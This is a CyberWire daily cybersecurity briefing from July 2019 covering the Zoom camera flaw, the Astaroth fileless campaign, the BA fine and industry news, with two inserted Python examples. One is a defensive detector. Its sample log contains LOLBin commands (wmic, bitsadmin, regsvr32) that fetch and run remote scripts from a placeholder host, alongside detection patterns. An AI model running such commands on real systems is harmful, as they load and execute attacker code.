
More signal. Less noise.

Visit LookingGlass Cyber Solutions at BlackHat USA 2019

There are many weapons to choose from when it comes to cybersecurity solutions providers – and you must choose wisely. With LookingGlass Cyber Solutions as your security provider, it's “Game Over” for threat actors trying to infiltrate your network. To learn more about our solutions, visit our experts at the LookingGlass Network & Chill Lounge, Mandalay Bay South, Palm A on level 3, August 7 & 8. Take a break from the hectic show floor for old school video games, happy hour from 3-7 PM, and a demo tailored to your organization’s security needs.

Daily briefing.

Researcher Jonathan Leitschuh reports a serious vulnerability in Zoom's Mac video-conferencing tool that allows "any website to forcibly join a user" to a call, complete with camera access.

Microsoft warns that a campaign using the fileless Astaroth information-stealing Trojan is underway. Astaroth lives off the land, running in memory through legitimate system tools rather than dropping its own executables to disk, which can make signature-based detection difficult. On the other hand, as BleepingComputer quotes Microsoft, the anomalous behavior of those otherwise legitimate tools can still betray Astaroth to systems that monitor for suspicious activity.
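The detection point above is the behavioral one: the binaries a living-off-the-land campaign runs are legitimate, so what gives it away is how they are chained together and what they are asked to do. The following is an added example, not code from Microsoft, BleepingComputer or this briefing. It scores constructed process-creation records (a Sysmon Event ID 1 style of timestamp, parent image, image and command line) on signals that fileless campaigns tend to produce. The list of abused binaries, the argument patterns and the threshold are assumptions for the example, not published indicators for Astaroth.

```python
"""Behaviour-based screen for living-off-the-land process activity.

Added example, not code from Microsoft, BleepingComputer or the briefing.
Parses constructed process-creation records in a Sysmon Event ID 1 style
(timestamp|parent image|image|command line) and scores each on signals that
fileless campaigns tend to produce. The binary list, argument patterns and
threshold are assumptions for the example, not indicators for Astaroth.
"""
import re

# Assumption: signed Windows binaries routinely abused to fetch and execute
# payloads without writing a malicious executable to disk.
LOLBINS = {"wmic.exe", "bitsadmin.exe", "certutil.exe", "regsvr32.exe",
           "mshta.exe", "rundll32.exe"}

# Assumption: command-line fragments that mark a remote fetch or script load.
SUSPICIOUS_ARGS = [
    re.compile(r"/format:\s*\S+\.xsl", re.I),        # WMIC XSL stylesheet execution
    re.compile(r"\bscrobj\.dll\b", re.I),             # regsvr32 scriptlet host
    re.compile(r"(?:-urlcache|/transfer)\b", re.I),   # certutil / bitsadmin download
    re.compile(r"https?://", re.I),                   # any remote URL on the command line
]

# Constructed sample records; hostnames and paths are placeholders.
LOG = r"""2019-07-08T10:01:02Z|C:\Windows\explorer.exe|C:\Program Files\Google\Chrome\chrome.exe|chrome.exe https://example.com/
2019-07-08T10:01:05Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\wmic.exe|wmic os get caption
2019-07-08T10:02:11Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\wmic.exe|wmic os get /format:"https://cdn.example.invalid/x.xsl"
2019-07-08T10:02:14Z|C:\Windows\System32\wbem\wmic.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job /download https://cdn.example.invalid/p.txt C:\Users\Public\p.txt
2019-07-08T10:02:19Z|C:\Windows\System32\wbem\wmic.exe|C:\Windows\System32\regsvr32.exe|regsvr32 /s /n /u /i:https://cdn.example.invalid/s.sct scrobj.dll
malformed record with too few fields
"""


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.strip().rsplit("\\", 1)[-1].lower()


def parse_record(line):
    """Split 'ts|parent|image|cmdline'; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    ts, parent, image, cmdline = parts
    return {"ts": ts, "parent": basename(parent),
            "image": basename(image), "cmdline": cmdline}


def score(rec):
    """Return (points, reasons) for one parsed record."""
    reasons = []
    if rec["image"] in LOLBINS:
        reasons.append("lolbin:" + rec["image"])
        if rec["parent"] in LOLBINS:
            # One abused binary spawning another is a stronger signal than either alone.
            reasons.append(f"chain:{rec['parent']}->{rec['image']}")
    for pat in SUSPICIOUS_ARGS:
        if pat.search(rec["cmdline"]):
            reasons.append("args:" + pat.pattern)
    return len(reasons), reasons


def triage(lines, threshold=2):
    """Return (ts, image, reasons) for records scoring at or above threshold."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:          # skip malformed input rather than crash the run
            continue
        points, reasons = score(rec)
        if points >= threshold:
            hits.append((rec["ts"], rec["image"], reasons))
    return hits


if __name__ == "__main__":
    for ts, image, reasons in triage(LOG.splitlines()):
        print(ts, image, ", ".join(reasons))
```

Run stand-alone, the script flags only the three records where an abused binary is combined with a remote fetch or a scriptlet load; the ordinary `wmic os get caption` and the browser opening a URL each score a single point and stay below the threshold. That is the trade-off the briefing describes: any one of these binaries is normal, so the rule has to key on the combination rather than the tool.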

ESET identifies a campaign using torrents to distribute the familiar GoBot2 backdoor. The bait consists of Korean movies and television shows; most of the victims have been in South Korea. 

The fine the UK's Information Commissioner's Office levied against British Airways for a September 2018 data breach is confirmed to be £183 million (roughly $229 million), far exceeding the ICO's previous record of £500,000, Forbes observes. High as it is, the fine is shy of the 4% of annual turnover the ICO could have taken; in British Airways' case, 4% would have amounted to roughly £500 million. The airline, which points out that it disclosed the breach within a day of discovery and has since found no sign of large-scale criminal exploitation, intends to appeal. The ICO apparently intends the penalty as a deterrent: any organization that handles personal information should take careful note.

NSA's Inspector General rendered the agency's required semi-annual report to Congress. It sees Fort Meade struggling with many of the same cybersecurity issues that concern other government agencies: no "serious or flagrant problems or abuses," but some "significant" issues.

Notes.

Today's issue includes events affecting China, Croatia, European Union, Finland, Republic of Korea, Russia, Slovakia, United Kingdom, United States.

Bring your own context.

Open source software is of course pervasive and usually effectively inescapable. But it can bring problems along with it.

"One of the vulnerabilities that we saw last year - and this is right now top of the leaderboard, we've never seen it quite this striking - is a vulnerability that was in FreeBSD. And so, this particular application was using a very old version of FreeBSD that had a vulnerability that was disclosed in May of 1990. Or the way we put it, probably it's older than some of the developers working on modern code."

—Tim Mackey, principal security strategist within the Synopsys Cyber Research Center, on the CyberWire's Research Saturday, 6.29.19.

Provenance and patching can be problematic.
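The practical counterpart to that quote is a routine that asks, for every pinned component, whether the pinned version falls inside a published vulnerable range and how old the disclosure is. The following is an added example, not Synopsys tooling or code from this briefing. The manifest format (one `name==version` per line), the advisory records and the reference date are all constructed for the example; the advisory IDs are placeholders and do not correspond to real CVEs.

```python
"""Flag pinned dependencies whose version sits in a known-vulnerable range.

Added example, not Synopsys tooling or code from the briefing. The manifest
format, the advisory records and the reference date are constructed; the
advisory IDs are placeholders, not real CVEs.
"""
import re
from datetime import date

# Assumption: the date the audit is run, used only to compute disclosure age.
REFERENCE_DATE = date(2019, 7, 9)

MANIFEST = """\
# constructed manifest for the example
libfoo==2.3.1
netparse==0.9.0-beta2   # pinned years ago and never revisited
tlsshim==1.4.7
"""

# Constructed advisories. 'fixed' is None when no fixed release exists yet.
ADVISORIES = [
    {"id": "ADV-0001", "component": "netparse", "introduced": "0.1.0",
     "fixed": "0.9.2", "disclosed": date(1990, 5, 1)},
    {"id": "ADV-0002", "component": "libfoo", "introduced": "2.3.0",
     "fixed": "2.3.1", "disclosed": date(2018, 11, 3)},
    {"id": "ADV-0003", "component": "tlsshim", "introduced": "1.4.0",
     "fixed": None, "disclosed": date(2019, 6, 20)},
]


def parse_version(s):
    """'1.2.3-beta2' -> (1, 2, 3); pre-release suffixes are dropped."""
    return tuple(int(n) for n in re.findall(r"\d+", s.split("-", 1)[0]))


def in_range(version, introduced, fixed):
    """True when introduced <= version < fixed (fixed=None: nothing is fixed)."""
    v = parse_version(version)
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def parse_manifest(text):
    """Return {component: version}; an unpinned line is an error, not a guess."""
    deps = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        name, sep, ver = line.partition("==")
        if not sep or not ver.strip():
            raise ValueError(f"unpinned dependency: {line}")
        deps[name.strip().lower()] = ver.strip()
    return deps


def audit(deps, advisories, today):
    """Match each advisory against the manifest; oldest disclosures first."""
    findings = []
    for adv in advisories:
        ver = deps.get(adv["component"])
        if ver is None or not in_range(ver, adv["introduced"], adv["fixed"]):
            continue
        findings.append({"id": adv["id"], "component": adv["component"],
                         "version": ver, "disclosed": adv["disclosed"],
                         "age_years": (today - adv["disclosed"]).days // 365})
    return sorted(findings, key=lambda f: f["disclosed"])


if __name__ == "__main__":
    for f in audit(parse_manifest(MANIFEST), ADVISORIES, today=REFERENCE_DATE):
        print(f"{f['component']}=={f['version']}: {f['id']} disclosed "
              f"{f['disclosed']} ({f['age_years']} years ago)")
```

Two design choices matter here. An unpinned dependency is rejected rather than silently treated as current, because a manifest that cannot say which version it ships cannot be audited at all. And a component whose fix has not been released (`fixed` is None) is reported as vulnerable at every version from the introducing one onward, so the finding survives until an advisory actually names a fixed release.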


Modernizing security analytics and operations with SOAPA.

Security operations is held back by the compromises of existing security analytics solutions, and throwing more money and time at the problem isn’t helping. Instead, you are left dealing with an army of point tools, exponential data growth, lack of context... the list goes on.

It's time to take a new approach to security analytics - explore how Devo can help evolve your SOC in this report by ESG.

In today's podcast, out later this afternoon, we speak with our partners at the Johns Hopkins University Information Security Institute, as Joe Carrigan describes security issues with D-Link routers. Our guest, Martin McKeay from Akamai, discusses their most recent State of the Internet report.

And Recorded Future's latest podcast, produced in partnership with the CyberWire, is up. In this episode, "Threat Intelligence for the OSINT Curious," Micah Hoffman, principal consultant at Spotlight Infosec, shares insight into the growing availability and importance of open source intelligence.

Cyber Security Summits: DC on July 16 and in Chicago on August 27 (Washington, DC, United States, July 16, 2019) Register for reduced admission to the Cyber Security Summit with promo code cyberwire19 for $95 admission ($350 without code). Sr. Level Executives are invited to learn about the latest threats & solutions in Cyber Security from experts from The FBI, The U.S. DOJ, Verizon, Center for Internet Security, IBM and more. Breakfast, Lunch & Cocktail Reception are included with your admission. Passes are limited, secure yours today.

RSA Conference 2019 Asia Pacific & Japan (Singapore, Republic of Singapore, July 16 - 18, 2019) Join industry leaders and peers at the region’s leading cybersecurity event. Learn the latest issues and solutions, stay on top of new regulations, demo cutting-edge products, expand your skills and grow your personal network. Register now.

XM Cyber is coming to Black Hat (Las Vegas, Nevada, United States, August 3 - 8, 2019) Visit XM Cyber at booth 875 to experience the first fully automated APT simulation platform to simulate, validate, and remediate hackers’ paths to organizational critical assets.

Wicked6 Cyber Games (Las Vegas, Nevada, United States, August 8, 2019) Wicked6 is a fundraiser and cybersecurity exhibition in a thrilling esports arena in Las Vegas on August 8, 2019. It’s a week when cybersecurity leaders from around the world come to Las Vegas, and all are welcome to come by to experience this exciting and unique cyber competition as a player, sponsor, or avid fan. Wicked6 will raise funds for the Women’s Society of Cyberjutsu, a national 501(c)(3) nonprofit that promotes training, mentoring and more to advance women and girls in cybersecurity careers.

Cyber Attacks, Threats, and Vulnerabilities

Croatian government targeted by mysterious hackers (ZDNet) Government agencies targeted with never before seen malware payload — named SilentTrinity.

Malicious campaign targets South Korean users with backdoor-laced torrents (Posilan Ltd) ESET researchers have discovered a malicious campaign distributing a backdoor via torrents, with Korean TV content used as a lure. Fans of Korean TV should be on the lookout for an ongoing campaign spreading malware via torrent sites, using South Korean movies and TV shows as a guise. The malware allows the attacker to connect …

Malicious campaign targets South Korean users with backdoor-laced torrents | WeLiveSecurity (WeLiveSecurity) ESET researchers dissect a malicious campaign that targets mainly South Korean users and spreads a backdoor via torrents, using local TV content as a lure.

Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website! (Medium) Vulnerability in the Mac Zoom Client allows any malicious website to enable your camera without your permission. The flaw potentially…

Serious Zoom security flaw could let websites hijack Mac cameras (The Verge) Not good

Microsoft Discovers Fileless Astaroth Trojan Campaign (BleepingComputer) A fileless malware campaign used by attackers to drop the information stealing Astaroth Trojan into the memory of infected computers was detected by Microsoft Defender ATP Research Team researchers.

Microsoft warns about Astaroth malware campaign (ZDNet) New hard-to-detect Astaroth campaigns spotted using fileless execution and living-off-the-land techniques.

Report: Fieldwork Software Leaks Sensitive Customer Data (vpnMentor) vpnMentor‘s research team found a leak in the Fieldwork software database. Noam Rotem and Ran Locar, the heads of our cybersecurity research team, found ...

More than 1,000 Android apps harvest data even after you deny permissions (CNET) The apps gather information such as location, even after owners explicitly say no. Google says a fix won’t come until Android Q.

Dridex Banking Trojan, RMS RAT Dropped via Fake eFax Messages (BleepingComputer) Researchers from Cofense have discovered a new malspam campaign that delivers fake eFax messages designed to drop a banking Trojan and RAT cocktail via malicious Microsoft Word document attachments.

Superhuman’s Superficial Privacy Fixes Do Not Prevent It From Spying on You (Mike Industries) Last week was a good week for privacy. Or was it? It took an article I almost didn’t publish and tens of thousands of people saying they were creeped out, but Superhuman admitted they were wrong and reduced the danger that …

Who’s Behind the GandCrab Ransomware? (KrebsOnSecurity) The crooks behind an affiliate program that paid cybercriminals to install the destructive and wildly successful GandCrab ransomware strain announced on May 31, 2019 they were terminating the program after allegedly having earned more than $2 billion in extortion payouts from victims. What follows is a deep dive into who may be responsible for recruiting new members to help spread the contagion.

A City Paid a Hefty Ransom to Hackers. But Its Pains Are Far From Over. (New York Times) Weeks after Lake City, Fla., was hit by a cyberattack, the phones are back on and email is working, but the city has not yet recovered all its files.

The Scene: Pirates Ripping Content From Amazon & Netflix (TorrentFreak) Traditionally, a major source of high-quality pirate releases has been retail discs, such as Blu-ray or DVD. Today, torrent and streaming sites are regularly fueled by content culled from streaming services such as Netflix and Amazon. Known online as WEB releases, these files are the product of a decryption process using tools mostly not intended for public use.

Cortana and Alexa, helpful assistants or security threat? (The Jerusalem Post) Technion student says there is a major cyber security risk between the two.

3 ways IoT devices compromise security (Fifth Domain) The National Institute of Standards and Technology released a report detailing the cybersecurity and privacy risks associated with the Internet of Things.

Vulnerability Summary for the Week of July 1, 2019 (CISA) The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.  

Hacker Ransom Demands From Cities Are Growing (The Crime Report) “It is quite profitable for the actors to conduct these sorts of attacks on victims,” said FBI agent Adam Lawson. “At the end of the day, people are paying the ransoms.” The FBI received nearly 1,500 ransomware reports last year.

Rampant Ransomware Attacks: How Cybercriminals Target Governments (WBUR) Across the country, cybercriminals are locking up local government files until ransom is paid. We look at the growing threat of ransomware attacks.

County cyber attack: Database still down, but costs covered (Citizens' Voice) The effects of a May cyber-attack on the Luzerne County computer network are still being felt, though nearly all costs the county incurred thus far should be covered by insurance, according to county Manager David Pedri. The county real estate database —

Social Engineering: The Non-technical Strategy to a Successful Cyber Attack (GC Capital Ideas) Cyber threat actors and their techniques have evolved, but most attacks still contain elements of social engineering. Without complex tools, software or extensive knowledge about the security platform, social engineering is an effective, non-technical strategy used by cyber criminals. It relies primarily on human interaction to gain trust and manipulates people into breaking standard security …

Tackling the Issue of Online Gaming Credential Stuffing (Security Boulevard) Issues in the gaming industry can provide lessons on the threats we face now and what could happen in larger, more critical industries.

Security Patches, Mitigations, and Software Updates

July Patch Tuesday forecast: Rules are changing for companies with custom applications (Help Net Security) Development components may even be an issue for companies who contract or purchase applications from a vendor.

Cyber Trends

Half of organisations don’t think their clients’ data is sensitive, research finds (Bdaily Business News) More than half of organisations believe their own data is more valuable than that of their clients, despite a rise…

State of Application Security at S&P Global World's 100 Largest Banks (Immuniweb) 97 out of 100 largest banks are vulnerable to web and mobile attacks enabling hackers to steal sensitive data.

They Kinda Want to Believe Apollo 11 Was Maybe a Hoax (New York Times) Conspiracy theories were once deadly serious. On the internet, skepticism about the moon landing shows how the mood has shifted.

Marketplace

Reports find new Huawei web flaws, plus troubling links to Chinese intelligence (BGR) Huawei continues to find itself on the wrong end of a sustained negative news cycle, with some of the latest revelations in new reports including assertions that new Huawei web application flaws ha…

Kaspersky Re-Ups With INTERPOL to Fight Global Cybercrime (Channelnomics) Move extends an agreement first inked by Russian vendor in 2014

Orange completes the acquisition of SecureLink, reinforcing its cybersecurity operations in Europe (Orange) Orange announces today that it has completed the acquisition of 100% of SecureLink, the leading independent cybersecurity player in Europe. Since signing a binding agreement with the investment fund Investcorp in May 2019, Orange has obtained approval from the relevant authorities enabling it to complete the transaction for an enterprise value of 515 million euros.

Is Broadcom (AVGO) a Step Closer to Acquiring Symantec? (Yahoo) Broadcom's (AVGO) expanding product portfolio positions it well to address the needs of rapidly growing technologies like IoT and 5G.

Symantec acquisition would give Broadcom a 'potent combination,' Jim Cramer says (CNBC) "If [interim Symantec CEO] Rick Hill can set off a bidding war, that would be the cherry on top," Jim Cramer says.

Virginia firm wins $35M contract for tech work at AFRL in Rome (Central New York Business Journal) The U.S. Department of Defense has awarded CACI Technologies Inc. of Chantilly, Virginia, a more than $34.8 million cost-plus-fixed-fee contract to develop and test software agility and resiliency software/hardware for the Air Force Research Laboratory (AFRL) in Rome.

Carbon Black: Attractive Buy Before Q2 Earnings (Seeking Alpha) Carbon Black reported a very strong Q1 earnings in early May, with revenue growing 21% and cloud revenue growing 80%. Despite the Q1 beat, management only slightly raised full year guidance, implying a conservative approach to the year. Valuation remains a little under pressure and relatively cheap compared to other faster-growth software security names.

Splunk Is Still A Great Buying Opportunity (Seeking Alpha) Splunk offers a platform that helps users derive new insights from machine data. The company has YoY revenue growth of 37.5%, positive free cash flow and scores quite well on the Rule of 40. It is fairly valued relative to other software stocks.

KnowBe4’s Year-Over-Year Sales Skyrocket 50% Over Q2 2019 for Another (PRWeb) KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, today announced a significant year-over-year sales

CrowdStrike Stock Is Still Rallying as Wall Street Raves About Cloud-Based Security (Barron's) A wave of Wall Street analysts picked up coverage of the newly public cloud-based security software company on Monday.

Oppenheimer outlines bull case on CrowdStrike (Seeking Alpha) Oppenheimer was one of the firms that started off coverage on CrowdStrike (NASDAQ:CRWD) with a bullish rating on its expectation for hypergrowth of over 30%.

Here's what Wall Street thinks about CrowdStrike, an unprofitable cybersecurity firm that raised more than $600 million in its June IPO (CRWD) | Markets Insider (Business Insider) Several Wall Street firms initiated coverage of cybersecurity provider CrowdStrike on Monday.  CrowdStrike raised $612 million in its IPO, and t...

Northrop Grumman Board Names Kathy J. Warden Chairman (Northrop Grumman Newsroom) The board of directors of Northrop Grumman Corporation (NYSE: NOC) has elected Kathy J. Warden as its chairman, effective August 1, 2019. Warden will serve as chairman, chief executive officer and president. Warden...

Products, Services, and Solutions

Zimperium Receives FedRAMP Authorization From US Federal Government (The Daily Nonpareil) Zimperium, the global leader in mobile threat defense (MTD), announced today that the Zimperium Federal Cloud has achieved a Federal Risk and Authorization Management Program (FedRAMP) Authorization.

Incident response at the speed of light: Cynet launches free offering for incident response service providers (Help Net Security) Cynet lets incident response service providers collect data, investigate, and remediate threats in their customers’ environments with the Cynet 360 platform for free.

Technologies, Techniques, and Standards

Cyber security risk ratings cannot accurately assess cyber risk across industrial ecosystems (Control Global) According to the Bitsight report, security ratings allow the electric utilities industry to accurately assess risk across their business ecosystem. However, cyber security ratings currently can’t address control system cyber security yet control systems are existential for any industrial organization. Until there is better understanding of the control system cyber risks, security ratings for industrial organizations are meaningless.

European power grids cooperate on cyber-security (SC Magazine) Aurélio Blanquet, the recently elected Chair of the European Network for Cyber Security (ENCS) Assembly Committee, calls for harmonisation and cooperation, particularly to close the skills gap.

At GDPR’s One Year Mark, Continued Compliance Efforts are Key and Can Help with CCPA Compliance (Cooley) With the EU General Data Protection Regulation (the “GDPR”) now over a year old, companies may feel that their data privacy challenges have settled down and that their GDPR work is complete.  …

Security Industry Association Releases ANSI-Approved CP-01 False Alarm Reduction Standard (Security Industry Association) SIA CP-01-2019 improves on the 2014 version and adjusts for current technologies; the new standard aims to reduce unnecessary police dispatches.

Mobile Device Authentication with Biometric-Based Access Bridges the Gap Between High-Security and Low-Friction, According to New Research | MobileIron.com (MobileIron) EMA research, sponsored by MobileIron, reveals mobile devices are the future of digital ID; 84% of organizations plan to adopt new authentication solutions within next two years

Lost in Transaction: The end of risk? (Paysafe) Will biometrics replace passwords for online payment authentication in 2019?

Attackers turn the tables on incident response strategies (SearchSecurity) Incident response strategies are not enough to protect against attackers who have incident response counterstrategies. Find out how attackers persevere against well-prepared targets and how to keep the upper hand.

I tried and failed to quit Facebook. Here’s what I did instead (Fast Company) Despite Facebook’s annoyances and privacy violations, abandoning the largest community in human history may have more downsides than benefits.

Design and Innovation

Fingerprint On The Pulse: Biometrics On The Move In More Places Than One (Fingerprints) We may be halfway through 2019, but as the year hurtles onwards, it’s important to pause and reflect on the latest and greatest news from Q2.

Frank Abagnale Jr: cyber security will be an issue "until we get rid of passwords" (Information Age) How can organisations beat malware? Frank Abagnale Jr, the former con man, says we don't stand a chance "until we get rid of passwords".

ISPs call Mozilla ‘Internet Villain’ for promoting DNS privacy (Naked Security) ISPA has shortlisted Mozilla for the sort of award that, on the face of it, no tech company should be keen to win – 2019’s Internet Villain.

Our Commitment to Lead the Fight Against Online Bullying (Instagram) Our mission is to connect you with the people and things you love, which only works if people feel comfortable expressing themselves on Instagram. We know bullying is a challenge many face, particu…

Inside Facebook’s information warfare team (Silicon Valley Business Journal) The social media giant’s ‘info ops’ team is at the frontline of its war on disinformation. Staffed by former intelligence operatives, investigative journalists and hackers the team has become increasingly slick.

How Facebook Fought Fake News About Facebook (Bloomberg) Polling data and secretive projects – ‘Stormchaser’ and ‘Night’s Watch’ – helped the social media giant track public sentiment, and respond to it

If News Recommendation Algorithms Feel Broken, Try This App (WIRED) In an attempt to combat the echo-chamber effect of algorithm-driven news apps, the new iOS app Gem takes a unique approach to recommendations.

Research and Development

BAE nets $4.7M from DARPA to integrate machine learning into RF signals detection (UPI) The Defense Advanced Research Projects Agency has awarded BAE Systems a contract worth up to $4.7 million to integrate machine learning into intelligence gathering involving radio frequency signals.

Legislation, Policy, and Regulation

Finland brings cybersecurity to the fore as EU presidency commences (The Daily Swig) Hybrid security exercises planned to counter threats

Iran Launches New Military Command And Control Unit To Withstand U.S. Cyberattack (Forbes) Last month the U.S. used a cyber attack to compromise Iran's command and control systems. Now Teheran has launched a new battlefield communications system it claims is impervious to a repeat attack.

US criticism of ZTE project ‘very absurd’: Chinese Foreign Ministry (Global Times) China dubbed US criticism of a project by Chinese telecommunications company ZTE in Argentina irrational and absurd on Monday, saying the monitoring device deal should not be politicized for ulterior motives.

The Huawei threat: China considers data to be critical national infrastructure (TheHill) As large tech companies and totalitarian regimes perfect their ability to aggregate and harness data, they will better influence social behavior.

India doubts Huawei’s 5G security promises, but U.K. carriers all buy in (VentureBeat) Despite U.S. concerns over Huawei's telecom gear, the heads of foreign allies are at best mixed on whether to ban the inexpensive, ready-to-go hardware.

Facebook and Twitter have not been invited to White House social media summit, sources say (CNN) The White House has not extended invitations to Facebook and Twitter to attend its social media summit on Thursday, people familiar with the matter said.

NSA Releases Semi-Annual Report to Congress (Lawfare) The National Security Agency’s Office of the Inspector General released an unclassified version of its mandatory semi-annual report to Congress covering Oct. 1, 2018 to March 31, 2019. The full document is available here below.  

NSA Isn’t Always Following Its Own Cybersecurity Policies, Watchdog Says (Nextgov.com) The NSA Inspector General found the agency has “room for improvement” in every IT security category outlined in FISMA.

NSA Still Grappling With Controls to Guard Against Surveillance Abuse (Government Executive) Watchdog also finds gaps in security of internal data systems.

Litigation, Investigation, and Law Enforcement

British Airways Hit With Record Fine Following 2018 Cyberattack (Forbes) BA is facing a record fine, showing the true cost of GDPR. Here’s what it means for the company, its investors and others who are hit by a cyberattack.

British Airways vows to fight record £183m data breach fine (The Telegraph) British Airways has vowed to fight a record fine of £183m for a customer data breach last year.

Finally, a watchdog with teeth: BA’s £183m fine shows that the ICO means business (The Telegraph) How do you know today's £183m fine on British Airways for a huge data theft from its website is a landmark ruling?

How The British Airways Breach Will Reveal The True Cost Of GDPR (Forbes) British Airways is the first major test case for ICO GDPR fines. What can we expect?

Dark web takedowns make good headlines, do little for security (CSO Online) Shutting down dark web marketplaces looks and feels good, but it hasn't significantly reduced risk. Worse, it drives cybercriminals to harder-to-track channels.

Security software company Eset sues Smer MP Blaha (Slovak Spectator) The company wants to protect its reputation from statements and videos Blaha has issued.

Lessons From An Israeli Company's Cybertech Patent Litigation (Mondaq) With origins dating back to 1996 and claiming more than $350 million in patent licensing revenue, Finjan Holdings is a frequent plaintiff in U.S. patent litigation. (Finnegan, Henderson, Farabow, Garrett & Dunner, LLP, 9 Jul 2019)

For a complete running list of events, please visit the Event Tracker on the CyberWire website.

Upcoming Events

Minneapolis Cybersecurity Conference (Minneapolis, Minnesota, USA, July 11, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...

Insider Threat Program Development - Management Training Course (Mountain View, California, USA, July 15 - 16, 2019) The Insider Threat Defense Group will hold our highly sought after Insider Threat Program (ITP) Development - Management Training Course, in Mountain View, California, on July 15-16, 2019. This comprehensive...

Raleigh Cybersecurity Conference (Raleigh, North Carolina, USA, July 18, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...

Cybertech Midwest 2019 (Indianapolis, Indiana, USA, July 24 - 25, 2019) Cybertech is the cyber industry’s foremost B2B networking platform featuring cutting-edge content by top executives, government officials, and leading decision-makers from the world of cyber. Our Cybertech...

Smoky Mountain Bigfoot Conference (Gatlinburg, Tennessee, USA, July 27, 2019) Join us for the first ever Smoky Mountain Bigfoot Conference. We have some of America's most experienced Bigfoot researchers and investigators including Cliff Barackman, Bigfoot Field Researcher and co-host...

Grow your brand and reach new customers.

Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.

Be a part of the CyberWire story.

People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.